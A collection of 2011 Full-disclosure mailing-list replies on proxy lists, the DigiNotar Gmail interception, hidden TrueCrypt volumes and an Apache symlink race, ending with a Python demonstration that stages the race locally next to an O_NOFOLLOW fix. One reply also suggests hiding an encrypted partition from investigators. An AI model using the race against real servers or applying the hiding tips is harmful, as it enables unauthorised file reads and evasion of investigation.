No agenda. He's providing a proxy list based on his continual research in the area. He didn't ask you to block anything.

T

Common stock, we work around the clock; we shove the poles in the holes.

From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of rancor
Sent: Thursday, September 01, 2011 9:09 AM
To: d...@mrhinkydink.com
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] China - the land of open proxies

2011/9/1 Mr. Hinky Dink d...@mrhinkydink.com

In July, hundreds of Chinese proxies on port 8909 started showing up every day on public proxy lists. In August the daily numbers were in the thousands. Here is the list I collected during that period. There are 135K proxies in this file (text, tab delimited, ~8 megs). http://www.mrhinkydink.com/utmods/135k.txt You may want to right-click and save as. This is offered as data you may be able to use for forensic purposes or router block lists. Most of these proxies are currently offline. When they are online, they're very good proxies.

You maybe just want us to block this IP since most are offline and we will not be able to verify its existence... What is your agenda?

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Is This MITM Attack to Gmail's SSL ?
On Tue, Aug 30, 2011 at 11:58 AM, Jeffrey Walton noloa...@gmail.com wrote:

On Mon, Aug 29, 2011 at 7:46 PM, coderman coder...@gmail.com wrote:

On Mon, Aug 29, 2011 at 4:35 PM, coderman coder...@gmail.com wrote:

... tech details http://pastebin.com/ff7Yg663

doh, try http://pastebin.com/SwCZqskV

It looks like Mozilla will be revoking trust in the DigiNotar root, http://blog.mozilla.com/security/.

google also: http://googleonlinesecurity.blogspot.com/2011/08/update-on-attempted-man-in-middle.html

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
[Full-disclosure] Is This MITM Attack to Gmail's SSL ?
http://www.google.co.uk/support/forum/p/gmail/thread?tid=2da6158b094b225ahl=en

any thoughts?

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Tor2web 2.0 is live! - NiX is doing copyright infringement

On Tue, Aug 23, 2011 at 7:49 PM, n...@myproxylists.com wrote:

On 8/23/11 6:20 PM, n...@myproxylists.com wrote:

This is what you jealous people want to say. I don't care, i don't have any business with glype.com nor with you.

Well then I wonder why you made this accusation to public.

What comes to proxifying, there are always some similarities. I'm a little bit upset because you made this false accusation. Anyways, browse this site with the glype proxy: http://midco.net/

it was pretty convincing.

You will see it will fail. Try it with my proxy, it opens OK. Simply, if I really would have copied the sources, my software should have the same bugs right?

nobody said that you simply copied it:
- stealing the glype.com php proxy source-code
- modifying it
- making your own release obfuscated with sourceguardian
- not even saying that it's Glype based

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] Encrypted files and the 5th amendment
On Wed, Jul 13, 2011 at 12:39 AM, Tim tim-secur...@sentinelchicken.org wrote:

Actually, there is no way to tell if there is another encrypted volume in existence or not. One might stipulate that there could be if the filesize is obvious, but when you get into gig size files that are storing small amounts of data, that argument loses value.

Well, yes, if you are trying to hide small amounts of data, then there are many ways to do it with plausible deniability. I thought you were talking about booting entire separate OSes based on boot-time password. Would be hard to hide that amount of data without at least raising suspicion to a determined investigator. Then again, many investigators are not determined. Keep the partition small, put it inside another encrypted partition, maybe they'll miss it.

check out the link in the last mail, seems to be what you are looking for.
http://www.truecrypt.org/docs/?s=hidden-volume
http://www.truecrypt.org/docs/?s=hidden-operating-system

-- Ferenc Kovács @Tyr43l - http://tyrael.hu
Re: [Full-disclosure] how to detect DDoS attack through HTTP response analysis(throuput)
2011/6/29 coderman coder...@gmail.com:

2011/6/26 김무성 ki...@infosec.co.kr:

... I'm looking for materials or information, research about how to detect DDoS attack through HTTP response analysis (throughput).

you're asking the wrong question. instead of asking "How can I automagically detect exploitation of my shitty app via HTTP Resp. codes" ask: "Why is my webapp so shitty that any number of arbitrary requests lead to resource exhaustion?"

because fetching (or imitating to fetch) the result is always less resource intensive than generating it? o_O

Tyrael
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
On Fri, Jun 24, 2011 at 5:24 PM, Christian Sciberras uuf6...@gmail.com wrote:

I think you meant apache follows symlinks even when -FollowSymLinks is not set. Otherwise it doesn't seem to make sense?

-FollowSymLinks turns off the FollowSymLinks option without resetting the other Options.
http://wiki.apache.org/httpd/FAQ#Why_do_my_Options_directives_not_have_the_desired_effect.3F

Tyrael
Re: [Full-disclosure] FYI: Apache httpd NoFollowSymLink follows symlinks feature
The FAQ says:

You can usually avoid problems by either finding the Options directive that already applies to a specific directory and changing it, or by putting your Options directive inside the most specific possible Directory section.

The option is in the most specific directory section and it also takes effect, returning forbidden on http request. But when you use the RenameLoop program in parallel, it fails to detect the symlink and delivers the linked data. This specific TOCTOU issue is known and part of the apache specification.

I didn't mean to imply otherwise, I've just explained what the +/- before an option does.

Tyrael
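The race the thread describes is a check-then-use gap: the server lstat()s the path, decides it is not a symlink, and then open()s it, and a rename() in between swaps a symlink into place. The following is an added example, not Apache's code and not the RenameLoop program mentioned above: a minimal model of that race in a temporary directory, with a hook standing in for the attacker's rename, beside the fix that removes the window by letting the kernel refuse the symlink at open() time (O_NOFOLLOW). File names and the "secret" content are constructed.

```python
"""Added example (not Apache code and not the RenameLoop program from the
thread): a minimal model of the race described above. check_then_open()
refuses a symlink with lstat() and then open()s the path, much as a server
with FollowSymLinks disabled does; the `between` hook stands in for the
window in which another process renames a symlink over the checked file.
open_nofollow() closes the window by letting the kernel refuse the symlink
at open() time. Paths and contents are constructed in a temporary directory."""
import errno
import os
import stat
import tempfile


def check_then_open(path, between=lambda: None):
    """Vulnerable: the check and the use are two separate syscalls."""
    if stat.S_ISLNK(os.lstat(path).st_mode):
        raise PermissionError(f"{path}: symlink refused")
    between()                       # the attacker's rename lands here
    with open(path, "rb") as f:
        return f.read()


def open_nofollow(path):
    """Safe for the final path component: O_NOFOLLOW makes open() itself fail
    with ELOOP on a symlink, so there is nothing to race. Directory components
    are still followed and need their own protection."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    try:
        return os.read(fd, 1 << 16)
    finally:
        os.close(fd)


def race_demo():
    """Stage the race and return what each approach hands the attacker."""
    d = tempfile.mkdtemp()
    secret = os.path.join(d, "secret.txt")   # outside the document root in reality
    public = os.path.join(d, "index.html")   # the file the check approves
    link = os.path.join(d, "stage.lnk")
    with open(secret, "w") as f:
        f.write("SECRET")
    with open(public, "w") as f:
        f.write("PUBLIC")
    os.symlink(secret, link)

    def swap():
        # rename() is atomic: index.html becomes a symlink to secret.txt
        # after lstat() approved it but before open() used it.
        os.rename(link, public)

    leaked = check_then_open(public, between=swap)
    try:
        open_nofollow(public)          # public is now the symlink
        nofollow = "opened"
    except OSError as e:
        nofollow = errno.errorcode[e.errno]
    return {"check_then_open": leaked, "open_nofollow": nofollow}


if __name__ == "__main__":
    print(race_demo())
```

The first value shows the content of the file the check never approved; the second shows the kernel refusing the same path outright. This is also why the usual advice for shared hosting is SymLinksIfOwnerMatch plus a ban on renames into served directories, rather than trusting the symlink check alone.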